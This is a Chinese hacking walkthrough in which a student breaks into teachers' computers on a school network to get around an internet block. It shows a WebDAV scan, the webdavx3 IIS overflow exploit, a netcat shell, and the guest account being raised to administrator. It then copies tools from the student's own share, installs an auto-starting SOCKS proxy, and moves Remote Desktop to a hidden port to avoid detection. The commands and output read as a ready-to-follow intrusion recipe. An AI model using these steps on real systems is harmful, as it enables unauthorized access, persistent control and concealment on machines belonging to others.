| 关键词: nbsp 192.168 子网 system 教师 winnt skserver 端口 代理 3389 |
为了预防非典,学校实行封闭式管理,学校内外的网吧又全部关闭,本来学校的机房 周六周日对外开放可以上网,现在学校一声令下也不许开.这可苦死了我们一帮 网虫呀,好在为了不影响教学质量我们平时的上机实验还是正常进行,我们学校那个 机房联网方式是,教师和学生机分两个字网分别是192.168.0.0和192.168.18.0为了 方便文件共享2个网络通过win2000的软路由连接.我们平时上机时老师就对win2000 的软路由进行限制.丢弃所有学生子网访问外网的数据包,但2个子网之间可以正常 访问说到这里聪明的朋友已经知道了怎么样突破了吧.对.只要我们访问外网的数据 包都通过教师的机器转发,就可以解决问题了.因为路由认为我们是访问教师的机器, 便让数据包通过而教师机再访问外网是不受限制的.原理并不难关键是怎么样在教师 机器上装代理软件.总不能跑到教师办公室里和教师说吧!既然这样不行的话,我们 就得用点非常规手段啦!由于现在webdavx溢出非常流行,所以我就用WebDAVScan对教 师子网全方位扫描,果然不出我的所料.发现了2台. 192.168.18.5 iis5.0 enable 192.168.18.18 iis5.0 enable 看来我的运气还是挺好的.接下来开始夺权吧 f:\>hacker\tools\webdavx3 192.168.18.5 IIS WebDAV overflow remote exploit by [email protected] start to try offset, if STOP a long time, you can press ^C and telnet 192.168.0.1 7788 try offset: 0 try offset: 1 waiting for iis restart....................... try offset: 2 waiting for iis restart....................... (IIS reboot,just waiting...) 程序运行到这里停顿稍长时间,若停顿时间比较长而无反应,^C) ^C f:\>hacker\tools\nc -vv 192.168.18.5 7788 进入目标机c:\winnt\system32 现在嘛,我是老大我怕谁! c:\net user guest /active:yes c:\net localgroup administrators guest /add 把guest用户激活并提升为管理员。 在自己的电脑上共享一个文件夹如 daili c:\winnt\system32>copy \\192.168.0.10\daili\skserver.exe 已复制1个文件 c:\winnt\system32>copy \\192.168.0.10\daili\c3389.exe 已复制1个文件 c:\winnt\system32>copy \\192.168.0.10\daili\3389.exe 已复制1个文件 c:\winnt\system32>skserver -install (安装skserver) Snake SockProxy Service installed. c:\winnt\system32>skserver -config port 4000 把默认端口改成4000 The Port value have set to 4000 c:\winnt\system32>skserver -config starttype 2 把服务设定为自动启动 The New StartType have set to 2 -- Auto c:\winnt\system32>net start skserver Snake SockProxy Service 服务正在启动 . Snake SockProxy Service 服务已经启动成功. 好了,现在代理服务安装完毕,我们可以把qq的sock5代理ip设为 192.168.0.5 端口为4000怎么样上去了吧。想看网页呀,点qq的浏览器呀! 如果出现超时的提示的话我们就要用到sockscap(代理帽子了)一路回车安装好 sockscap后填上你做的代理服务器ip地址和端口号并选者允许socks5代理,配置完毕 以后会出现一个主界面。把qq拖入空白框里就可以了!如IE之类不能拖入的可以 点击file-new-browse选者你要代理的软件就可以了。 如果你还想更多更方便的利用这个台机器的话我们就要用到我上传的3389.exe 和c3389.exe了 3389.exe就是开启3389终端服务的工具只要直接执行3389.exe 等主机重启后你 就可以用xp_ts连接上去了, 如果你等不急想立即重启的话只要在加个参数 /r就可以了!c3389是我们 用来改端口因为使用默认的3389端口的话容易被老师发现,而且还容易被同行 盗用。呵呵c3389的用法是直接打入c3389你要更改的端口号 回车就可以了 。 等机器重启后你就可以登陆了,不过用xp-ts连接的时候要用IP:端口来连接 否者无法登陆。比如我就要用192.168.18.5:5001来登陆。 为了不让老师发现你可以用ca或pus更改注册表克隆一个帐号具体方法就不细说了。 毕竟我现在可以上网了。 By CodFish QQ:2866210 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|